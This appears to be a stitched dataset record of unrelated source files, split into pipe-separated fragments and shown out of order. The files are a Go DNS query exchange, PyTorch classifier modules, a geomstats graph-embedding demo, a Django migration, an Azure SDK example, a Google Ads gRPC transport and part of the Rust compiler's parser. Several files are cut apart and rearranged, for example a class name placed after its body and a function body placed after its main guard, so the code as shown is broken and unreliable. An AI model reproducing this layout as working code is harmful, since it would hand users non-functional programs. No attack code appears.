}
if _, err := pc.Write(binQuery); err != nil {
return DNSExchangeResponse{err: err}
}
packet = make([]byte, MaxDNSPacketSize)
length, err := pc.Read(packet)
if err != nil {
return DNSExchangeResponse{err: err}
}
rtt = time.Since(now)
packet = packet[:length]
} else {
binQuery, err := query.Pack()
if err != nil {
return DNSExchangeResponse{err: err}
}
tcpAddr, err := net.ResolveTCPAddr("tcp", serverAddress)
if err != nil {
return DNSExchangeResponse{err: err}
}
upstreamAddr := tcpAddr
if relay != nil {
proxy.prepareForRelay(tcpAddr.IP, tcpAddr.Port, &binQuery)
upstreamAddr = relay.RelayTCPAddr
}
now := time.Now()
var pc net.Conn
proxyDialer := proxy.xTransport.proxyDialer
if proxyDialer == nil {
pc, err = net.DialTCP("tcp", nil, upstreamAddr)
} else {
pc, err = (*proxyDialer).Dial("tcp", tcpAddr.String())
}
if err != nil {
return DNSExchangeResponse{err: err}
}
defer pc.Close()
if err := pc.SetDeadline(time.Now().Add(proxy.timeout)); err != nil {
return DNSExchangeResponse{err: err}
}
binQuery, err = PrefixWithSize(binQuery)
if err != nil {
return DNSExchangeResponse{err: err}
}
if _, err := pc.Write(binQuery); err != nil {
return DNSExchangeResponse{err: err}
}
packet, err = ReadPrefixed(&pc)
if err != nil {
return DNSExchangeResponse{err: err}
}
rtt = time.Since(now)
}
msg := dns.Msg{}
if err := msg.Unpack(packet); err != nil {
return DNSExchangeResponse{err: err}
}
return DNSExchangeResponse{response: &msg, rtt: rtt, err: nil}
}
| {
return packet[2]&2 == 2
} |
esvs.py | import torch as t
import torch.nn as nn
import torch.nn.functional as F
class MTRN(nn.Module):
def __init__(self, frame_count: int):
super().__init__()
self.frame_count = frame_count
self.fc1 = nn.Linear(256 * frame_count, 1024)
self.fc2 = nn.Linear(1024, 512)
self.fc3 = nn.Linear(512, 397)
def forward(self, x):
x = x.view(-1, 256 * self.frame_count)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class V_MTRN(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_count: int, dropout_probability: float = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.dropout_count = dropout_count
self.fc1 = nn.Linear(256 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
self.fc2 = nn.Linear(hidden_layer_size, 512)
self.fc3_verb = nn.Linear(512, 97)
def forward(self, x):
x = x.view(-1, 256 * self.frame_count)
x = F.relu(self.fc1(x))
if self.dropout_count >= 1:
x = self.dropout(x)
x = F.relu(self.fc2(x))
if self.dropout_count == 2:
x = self.dropout(x)
x = self.fc3_verb(x)
return x
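# Usage sketch (sizes are illustrative): V_MTRN maps per-frame 256-d
# features to 97 verb logits, e.g.
#
#   model = V_MTRN(frame_count=8, hidden_layer_size=1024, dropout_count=1)
#   logits = model(t.randn(4, 8, 256))  # -> shape (4, 97)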
class N_MTRN(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_count: int, dropout_probability: float = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.dropout_count = dropout_count
self.fc1 = nn.Linear(256 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
self.fc2 = nn.Linear(hidden_layer_size, 512)
self.fc3_noun = nn.Linear(512, 300)
def forward(self, x):
x = x.view(-1, 256 * self.frame_count)
x = F.relu(self.fc1(x))
if self.dropout_count >= 1:
x = self.dropout(x)
x = F.relu(self.fc2(x))
if self.dropout_count == 2:
x = self.dropout(x)
x = self.fc3_noun(x)
return x
class V_MF(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_probability: float = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.fc1 = nn.Linear(768 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
self.fc2_verb = nn.Linear(hidden_layer_size, 97)
| def forward(self, x):
x = x.view(-1, 768 * self.frame_count)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2_verb(x)
return x
class N_MF(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_probability: float = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.fc1 = nn.Linear(768 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
self.fc2_noun = nn.Linear(hidden_layer_size, 300)
def forward(self, x):
x = x.view(-1, 768 * self.frame_count)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2_noun(x)
return x | |
learning_graph_embedding_and_predicting.py | """Learning embedding of graph using Poincare Ball Model."""
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import geomstats.backend as gs
import geomstats.visualization as visualization
from geomstats.datasets.prepare_graph_data import HyperbolicEmbedding
from geomstats.datasets.utils import load_karate_graph
from geomstats.learning.kmeans import RiemannianKMeans
from geomstats.learning.kmedoids import RiemannianKMedoids
def main():
|
if __name__ == "__main__":
main()
| """Learning Poincaré graph embedding.
Learns Poincaré Ball embedding by using Riemannian
gradient descent algorithm. Then K-means is applied
to learn labels of each data sample.
"""
gs.random.seed(1234)
karate_graph = load_karate_graph()
hyperbolic_embedding = HyperbolicEmbedding(max_epochs=3)
embeddings = hyperbolic_embedding.embed(karate_graph)
colors = {1: "b", 2: "r"}
group_1 = mpatches.Patch(color=colors[1], label="Group 1")
group_2 = mpatches.Patch(color=colors[2], label="Group 2")
circle = visualization.PoincareDisk(point_type="ball")
_, ax = plt.subplots(figsize=(8, 8))
ax.axes.xaxis.set_visible(False)
ax.axes.yaxis.set_visible(False)
circle.set_ax(ax)
circle.draw(ax=ax)
for i_embedding, embedding in enumerate(embeddings):
x_coords = embedding[0]
y_coords = embedding[1]
pt_id = i_embedding
plt.scatter(x_coords, y_coords, c=colors[karate_graph.labels[pt_id][0]], s=150)
ax.annotate(pt_id, (x_coords, y_coords))
plt.tick_params(which="both")
plt.title("Poincare Ball Embedding of the Karate Club Network")
plt.legend(handles=[group_1, group_2])
plt.show()
n_clusters = 2
kmeans = RiemannianKMeans(
metric=hyperbolic_embedding.manifold.metric,
n_clusters=n_clusters,
init="random",
)
centroids = kmeans.fit(X=embeddings)
labels = kmeans.predict(X=embeddings)
colors = ["g", "c", "m"]
circle = visualization.PoincareDisk(point_type="ball")
_, ax2 = plt.subplots(figsize=(8, 8))
circle.set_ax(ax2)
circle.draw(ax=ax2)
ax2.axes.xaxis.set_visible(False)
ax2.axes.yaxis.set_visible(False)
group_1_predicted = mpatches.Patch(color=colors[0], label="Predicted Group 1")
group_2_predicted = mpatches.Patch(color=colors[1], label="Predicted Group 2")
group_centroids = mpatches.Patch(color=colors[2], label="Cluster centroids")
for _ in range(n_clusters):
for i_embedding, embedding in enumerate(embeddings):
x_coords = embedding[0]
y_coords = embedding[1]
pt_id = i_embedding
if labels[i_embedding] == 0:
color = colors[0]
else:
color = colors[1]
plt.scatter(x_coords, y_coords, c=color, s=150)
ax2.annotate(pt_id, (x_coords, y_coords))
for _, centroid in enumerate(centroids):
x_coords = centroid[0]
y_coords = centroid[1]
plt.scatter(
x_coords,
y_coords,
c=colors[2],
marker="*",
s=150,
)
plt.title("K-means applied to Karate club embedding")
plt.legend(handles=[group_1_predicted, group_2_predicted, group_centroids])
plt.show()
kmedoid = RiemannianKMedoids(
metric=hyperbolic_embedding.manifold.metric,
n_clusters=n_clusters,
init="random",
n_jobs=2,
)
centroids = kmedoid.fit(data=embeddings, max_iter=100)
labels = kmedoid.predict(data=embeddings)
colors = ["g", "c", "m"]
circle = visualization.PoincareDisk(point_type="ball")
_, ax2 = plt.subplots(figsize=(8, 8))
circle.set_ax(ax2)
circle.draw(ax=ax2)
ax2.axes.xaxis.set_visible(False)
ax2.axes.yaxis.set_visible(False)
group_1_predicted = mpatches.Patch(color=colors[0], label="Predicted Group 1")
group_2_predicted = mpatches.Patch(color=colors[1], label="Predicted Group 2")
group_centroids = mpatches.Patch(color=colors[2], label="Cluster centroids")
for _ in range(n_clusters):
for i_embedding, embedding in enumerate(embeddings):
x_coords = embedding[0]
y_coords = embedding[1]
pt_id = i_embedding
if labels[i_embedding] == 0:
color = colors[0]
else:
color = colors[1]
plt.scatter(x_coords, y_coords, c=color, s=150)
ax2.annotate(pt_id, (x_coords, y_coords))
for _, centroid in enumerate(centroids):
x_coords = centroid[0]
y_coords = centroid[1]
plt.scatter(
x_coords,
y_coords,
c=colors[2],
marker="*",
s=150,
)
plt.title("K-Medoids applied to Karate club embedding")
plt.legend(handles=[group_1_predicted, group_2_predicted, group_centroids])
plt.show()
|
0001_initial.py | # Generated by Django 2.2.3 on 2019-07-27 12:22
from django.db import migrations, models
class | (migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DepModO2O',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('placeholder', models.BooleanField(default=True)),
],
),
]
| Migration |
ze_generated_example_integrationruntimenodeipaddress_client_test.go | //go:build go1.18
// +build go1.18
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for license information.
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
package armsynapse_test
import (
"context"
"log"
"github.com/Azure/azure-sdk-for-go/sdk/azidentity"
"github.com/Azure/azure-sdk-for-go/sdk/resourcemanager/synapse/armsynapse"
)
// Generated from example definition: https://github.com/Azure/azure-rest-api-specs/tree/main/specification/synapse/resource-manager/Microsoft.Synapse/preview/2021-06-01-preview/examples/IntegrationRuntimeNodes_GetIpAddress.json
func ExampleIntegrationRuntimeNodeIPAddressClient_Get() {
cred, err := azidentity.NewDefaultAzureCredential(nil)
if err != nil {
log.Fatalf("failed to obtain a credential: %v", err)
}
ctx := context.Background()
client, err := armsynapse.NewIntegrationRuntimeNodeIPAddressClient("<subscription-id>", cred, nil)
if err != nil {
log.Fatalf("failed to create client: %v", err)
}
res, err := client.Get(ctx,
"<resource-group-name>",
"<workspace-name>",
"<integration-runtime-name>", | "<node-name>",
nil)
if err != nil {
log.Fatalf("failed to finish the request: %v", err)
}
// TODO: use response item
_ = res
} | |
grpc.py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v7.resources.types import ad_group_simulation
from google.ads.googleads.v7.services.types import ad_group_simulation_service
from .base import AdGroupSimulationServiceTransport, DEFAULT_CLIENT_INFO
class AdGroupSimulationServiceGrpcTransport(AdGroupSimulationServiceTransport):
"""gRPC backend transport for AdGroupSimulationService.
Service to fetch ad group simulations.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def | (self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_ad_group_simulation(
self,
) -> Callable[
[ad_group_simulation_service.GetAdGroupSimulationRequest],
ad_group_simulation.AdGroupSimulation,
]:
r"""Return a callable for the
get ad group simulation
method over gRPC.
Returns the requested ad group simulation in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetAdGroupSimulationRequest],
~.AdGroupSimulation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_ad_group_simulation" not in self._stubs:
self._stubs[
"get_ad_group_simulation"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v7.services.AdGroupSimulationService/GetAdGroupSimulation",
request_serializer=ad_group_simulation_service.GetAdGroupSimulationRequest.serialize,
response_deserializer=ad_group_simulation.AdGroupSimulation.deserialize,
)
return self._stubs["get_ad_group_simulation"]
__all__ = ("AdGroupSimulationServiceGrpcTransport",)
parser.rs
use crate::ast::{AngleBracketedArgs, ParenthesizedArgs, AttrStyle, BareFnTy};
use crate::ast::{GenericBound, TraitBoundModifier};
use crate::ast::Unsafety;
use crate::ast::{Mod, AnonConst, Arg, Arm, Guard, Attribute, BindingMode, TraitItemKind};
use crate::ast::Block;
use crate::ast::{BlockCheckMode, CaptureBy, Movability};
use crate::ast::{Constness, Crate};
use crate::ast::Defaultness;
use crate::ast::EnumDef;
use crate::ast::{Expr, ExprKind, RangeLimits};
use crate::ast::{Field, FnDecl, FnHeader};
use crate::ast::{ForeignItem, ForeignItemKind, FunctionRetTy};
use crate::ast::{GenericParam, GenericParamKind};
use crate::ast::GenericArg;
use crate::ast::{Ident, ImplItem, IsAsync, IsAuto, Item, ItemKind};
use crate::ast::{Label, Lifetime};
use crate::ast::Local;
use crate::ast::MacStmtStyle;
use crate::ast::{Mac, Mac_, MacDelimiter};
use crate::ast::{MutTy, Mutability};
use crate::ast::{Pat, PatKind, PathSegment};
use crate::ast::{PolyTraitRef, QSelf};
use crate::ast::{Stmt, StmtKind};
use crate::ast::{VariantData, StructField};
use crate::ast::StrStyle;
use crate::ast::SelfKind;
use crate::ast::{TraitItem, TraitRef, TraitObjectSyntax};
use crate::ast::{Ty, TyKind, AssocTyConstraint, AssocTyConstraintKind, GenericBounds};
use crate::ast::{Visibility, VisibilityKind, WhereClause, CrateSugar};
use crate::ast::{UseTree, UseTreeKind};
use crate::ast::{BinOpKind, UnOp};
use crate::ast::{RangeEnd, RangeSyntax};
use crate::{ast, attr};
use crate::ext::base::DummyResult;
use crate::source_map::{self, SourceMap, Spanned, respan};
use crate::parse::{SeqSep, classify, literal, token};
use crate::parse::lexer::{TokenAndSpan, UnmatchedBrace};
use crate::parse::lexer::comments::{doc_comment_style, strip_doc_comment_decoration};
use crate::parse::token::DelimToken;
use crate::parse::{new_sub_parser_from_file, ParseSess, Directory, DirectoryOwnership};
use crate::util::parser::{AssocOp, Fixity};
use crate::print::pprust;
use crate::ptr::P;
use crate::parse::PResult;
use crate::ThinVec;
use crate::tokenstream::{self, DelimSpan, TokenTree, TokenStream, TreeAndJoint};
use crate::symbol::{kw, sym, Symbol};
use crate::parse::diagnostics::{Error, dummy_arg};
use errors::{Applicability, DiagnosticBuilder, DiagnosticId, FatalError};
use rustc_target::spec::abi::{self, Abi};
use syntax_pos::{Span, BytePos, DUMMY_SP, FileName};
use log::debug;
use std::borrow::Cow;
use std::cmp;
use std::mem;
use std::path::{self, Path, PathBuf};
use std::slice;
#[derive(Debug)]
/// Whether the type alias or associated type is a concrete type or an existential type
pub enum AliasKind {
/// Just a new name for the same type
Weak(P<Ty>),
/// Only trait impls of the type will be usable, not the actual type itself
Existential(GenericBounds),
}
bitflags::bitflags! {
struct Restrictions: u8 {
const STMT_EXPR = 1 << 0;
const NO_STRUCT_LITERAL = 1 << 1;
}
}
type ItemInfo = (Ident, ItemKind, Option<Vec<Attribute>>);
/// Specifies how to parse a path.
#[derive(Copy, Clone, PartialEq)]
pub enum PathStyle {
/// In some contexts, notably in expressions, paths with generic arguments are ambiguous
/// with something else. For example, in expressions `segment < ....` can be interpreted
/// as a comparison and `segment ( ....` can be interpreted as a function call.
/// In all such contexts the non-path interpretation is preferred by default for practical
/// reasons, but the path interpretation can be forced by the disambiguator `::`, e.g.
/// `x<y>` - comparisons, `x::<y>` - unambiguously a path.
Expr,
/// In other contexts, notably in types, no ambiguity exists and paths can be written
/// without the disambiguator, e.g., `x<y>` - unambiguously a path.
/// Paths with disambiguators are still accepted, `x::<Y>` - unambiguously a path too.
Type,
/// A path with generic arguments disallowed, e.g., `foo::bar::Baz`, used in imports,
/// visibilities or attributes.
/// Technically, this variant is unnecessary and e.g., `Expr` can be used instead
/// (paths in "mod" contexts have to be checked later for absence of generic arguments
/// anyway, due to macros), but it is used to avoid weird suggestions about expected
/// tokens when something goes wrong.
Mod,
}
#[derive(Clone, Copy, PartialEq, Debug)]
crate enum SemiColonMode {
Break,
Ignore,
Comma,
}
#[derive(Clone, Copy, PartialEq, Debug)]
crate enum BlockMode {
Break,
Ignore,
}
/// Possibly accepts a `token::Interpolated` expression (a pre-parsed expression
/// dropped into the token stream, which happens while parsing the result of
/// macro expansion). Placement of these is not as complex as I feared it would
/// be. The important thing is to make sure that lookahead doesn't balk at
/// `token::Interpolated` tokens.
macro_rules! maybe_whole_expr {
($p:expr) => {
if let token::Interpolated(nt) = &$p.token {
match &**nt {
token::NtExpr(e) | token::NtLiteral(e) => {
let e = e.clone();
$p.bump();
return Ok(e);
}
token::NtPath(path) => {
let path = path.clone();
$p.bump();
return Ok($p.mk_expr($p.span, ExprKind::Path(None, path), ThinVec::new()));
}
token::NtBlock(block) => {
let block = block.clone();
$p.bump();
return Ok($p.mk_expr($p.span, ExprKind::Block(block, None), ThinVec::new()));
}
_ => {},
};
}
}
}
/// As `maybe_whole_expr!`, but for things other than expressions.
macro_rules! maybe_whole {
($p:expr, $constructor:ident, |$x:ident| $e:expr) => {
if let token::Interpolated(nt) = &$p.token {
if let token::$constructor(x) = &**nt {
let $x = x.clone();
$p.bump();
return Ok($e);
}
}
};
}
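// Illustrative sketch (not from the original source): how these macros are
// used. A parsing method first checks whether the current token is already a
// pre-parsed nonterminal of the right kind and, if so, returns it without
// re-parsing:
//
//     fn parse_ty_sketch<'a>(p: &mut Parser<'a>) -> PResult<'a, P<Ty>> {
//         maybe_whole!(p, NtTy, |ty| ty); // early-return an interpolated type
//         // ...otherwise parse the type token by token...
//         unimplemented!()
//     }
//
// `parse_ty_common` below uses exactly this pattern with `NtTy`.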
/// If the next tokens are ill-formed `$ty::` recover them as `<$ty>::`.
macro_rules! maybe_recover_from_interpolated_ty_qpath {
($self: expr, $allow_qpath_recovery: expr) => {
if $allow_qpath_recovery && $self.look_ahead(1, |t| t == &token::ModSep) {
if let token::Interpolated(nt) = &$self.token {
if let token::NtTy(ty) = &**nt {
let ty = ty.clone();
$self.bump();
return $self.maybe_recover_from_bad_qpath_stage_2($self.prev_span, ty);
}
}
}
}
}
fn maybe_append(mut lhs: Vec<Attribute>, mut rhs: Option<Vec<Attribute>>) -> Vec<Attribute> {
if let Some(ref mut rhs) = rhs {
lhs.append(rhs);
}
lhs
}
#[derive(Debug, Clone, Copy, PartialEq)]
enum PrevTokenKind {
DocComment,
Comma,
Plus,
Interpolated,
Eof,
Ident,
BitOr,
Other,
}
// NOTE: `Ident`s are handled by `common.rs`.
#[derive(Clone)]
pub struct Parser<'a> {
pub sess: &'a ParseSess,
/// The current token.
pub token: token::Token,
/// The span of the current token.
pub span: Span,
meta_var_span: Option<Span>,
/// The span of the previous token.
pub prev_span: Span,
/// The kind of the previous token.
prev_token_kind: PrevTokenKind,
restrictions: Restrictions,
/// Used to determine the path to externally loaded source files.
crate directory: Directory<'a>,
/// `true` to parse sub-modules in other files.
pub recurse_into_file_modules: bool,
/// Name of the root module this parser originated from. If `None`, then the
/// name is not known. This does not change while the parser is descending
/// into modules, and sub-parsers have new values for this name.
pub root_module_name: Option<String>,
crate expected_tokens: Vec<TokenType>,
crate token_cursor: TokenCursor,
desugar_doc_comments: bool,
/// `true` if we should configure out-of-line modules as we parse.
pub cfg_mods: bool,
/// This field is used to keep track of how many left angle brackets we have seen. This is
/// required in order to detect extra leading left angle brackets (`<` characters) and error
/// appropriately.
///
/// See the comments in the `parse_path_segment` function for more details.
crate unmatched_angle_bracket_count: u32,
crate max_angle_bracket_count: u32,
/// List of all unclosed delimiters found by the lexer. If an entry is used for error recovery
/// it gets removed from here. Every entry left at the end gets emitted as an independent
/// error.
crate unclosed_delims: Vec<UnmatchedBrace>,
crate last_unexpected_token_span: Option<Span>,
/// If present, this `Parser` is not parsing Rust code but rather a macro call.
crate subparser_name: Option<&'static str>,
}
impl<'a> Drop for Parser<'a> {
fn drop(&mut self) {
let diag = self.diagnostic();
emit_unclosed_delims(&mut self.unclosed_delims, diag);
}
}
#[derive(Clone)]
crate struct TokenCursor {
crate frame: TokenCursorFrame,
crate stack: Vec<TokenCursorFrame>,
}
#[derive(Clone)]
crate struct TokenCursorFrame {
crate delim: token::DelimToken,
crate span: DelimSpan,
crate open_delim: bool,
crate tree_cursor: tokenstream::Cursor,
crate close_delim: bool,
crate last_token: LastToken,
}
/// This is used in `TokenCursorFrame` above to track tokens that are consumed
/// by the parser, and then that's transitively used to record the tokens that
/// each parse AST item is created with.
///
/// Right now this has two states, either collecting tokens or not collecting
/// tokens. If we're collecting tokens we just save everything off into a local
/// `Vec`. This should eventually though likely save tokens from the original
/// token stream and just use slicing of token streams to avoid creation of a
/// whole new vector.
///
/// The second state is where we're passively not recording tokens, but the last
/// token is still tracked for when we want to start recording tokens. This
/// "last token" means that when we start recording tokens we'll want to ensure
/// that this, the first token, is included in the output.
///
/// You can find some more example usage of this in the `collect_tokens` method
/// on the parser.
#[derive(Clone)]
crate enum LastToken {
Collecting(Vec<TreeAndJoint>),
Was(Option<TreeAndJoint>),
}
impl TokenCursorFrame {
fn new(sp: DelimSpan, delim: DelimToken, tts: &TokenStream) -> Self {
TokenCursorFrame {
delim: delim,
span: sp,
open_delim: delim == token::NoDelim,
tree_cursor: tts.clone().into_trees(),
close_delim: delim == token::NoDelim,
last_token: LastToken::Was(None),
}
}
}
impl TokenCursor {
fn next(&mut self) -> TokenAndSpan {
loop {
let tree = if !self.frame.open_delim {
self.frame.open_delim = true;
TokenTree::open_tt(self.frame.span.open, self.frame.delim)
} else if let Some(tree) = self.frame.tree_cursor.next() {
tree
} else if !self.frame.close_delim {
self.frame.close_delim = true;
TokenTree::close_tt(self.frame.span.close, self.frame.delim)
} else if let Some(frame) = self.stack.pop() {
self.frame = frame;
continue
} else {
return TokenAndSpan { tok: token::Eof, sp: DUMMY_SP }
};
match self.frame.last_token {
LastToken::Collecting(ref mut v) => v.push(tree.clone().into()),
LastToken::Was(ref mut t) => *t = Some(tree.clone().into()),
}
match tree {
TokenTree::Token(sp, tok) => return TokenAndSpan { tok: tok, sp: sp },
TokenTree::Delimited(sp, delim, tts) => {
let frame = TokenCursorFrame::new(sp, delim, &tts);
self.stack.push(mem::replace(&mut self.frame, frame));
}
}
}
}
fn next_desugared(&mut self) -> TokenAndSpan {
let (sp, name) = match self.next() {
TokenAndSpan { sp, tok: token::DocComment(name) } => (sp, name),
tok => return tok,
};
let stripped = strip_doc_comment_decoration(&name.as_str());
// Searches for the occurrences of `"#*` and returns the minimum number of `#`s
// required to wrap the text.
let mut num_of_hashes = 0;
let mut count = 0;
for ch in stripped.chars() {
count = match ch {
'"' => 1,
'#' if count > 0 => count + 1,
_ => 0,
};
num_of_hashes = cmp::max(num_of_hashes, count);
}
let delim_span = DelimSpan::from_single(sp);
let body = TokenTree::Delimited(
delim_span,
token::Bracket,
[
TokenTree::Token(sp, token::Ident(ast::Ident::with_empty_ctxt(sym::doc), false)),
TokenTree::Token(sp, token::Eq),
TokenTree::Token(sp, token::Token::lit(
token::StrRaw(num_of_hashes), Symbol::intern(&stripped), None
)),
]
.iter().cloned().collect::<TokenStream>().into(),
);
self.stack.push(mem::replace(&mut self.frame, TokenCursorFrame::new(
delim_span,
token::NoDelim,
&if doc_comment_style(&name.as_str()) == AttrStyle::Inner {
[TokenTree::Token(sp, token::Pound), TokenTree::Token(sp, token::Not), body]
.iter().cloned().collect::<TokenStream>().into()
} else {
[TokenTree::Token(sp, token::Pound), body]
.iter().cloned().collect::<TokenStream>().into()
},
)));
self.next()
}
}
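// Illustrative example (not from the original source): `next_desugared`
// rewrites a doc comment into the equivalent attribute tokens. The outer doc
// comment
//
//     /// hello "world"
//
// becomes a token stream spelling
//
//     #[doc = r#"hello "world""#]
//
// where the number of `#`s on the raw string is the minimum needed to wrap
// the text, as computed by the `num_of_hashes` scan above. Inner doc
// comments (`//!`) desugar to `#![doc = ...]` instead.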
#[derive(Clone, PartialEq)]
crate enum TokenType {
Token(token::Token),
Keyword(Symbol),
Operator,
Lifetime,
Ident,
Path,
Type,
Const,
}
impl TokenType {
crate fn to_string(&self) -> String {
match *self {
TokenType::Token(ref t) => format!("`{}`", pprust::token_to_string(t)),
TokenType::Keyword(kw) => format!("`{}`", kw),
TokenType::Operator => "an operator".to_string(),
TokenType::Lifetime => "lifetime".to_string(),
TokenType::Ident => "identifier".to_string(),
TokenType::Path => "path".to_string(),
TokenType::Type => "type".to_string(),
TokenType::Const => "const".to_string(),
}
}
}
/// Returns `true` if `IDENT t` can start a type -- `IDENT::a::b`, `IDENT<u8, u8>`,
/// `IDENT<<u8 as Trait>::AssocTy>`.
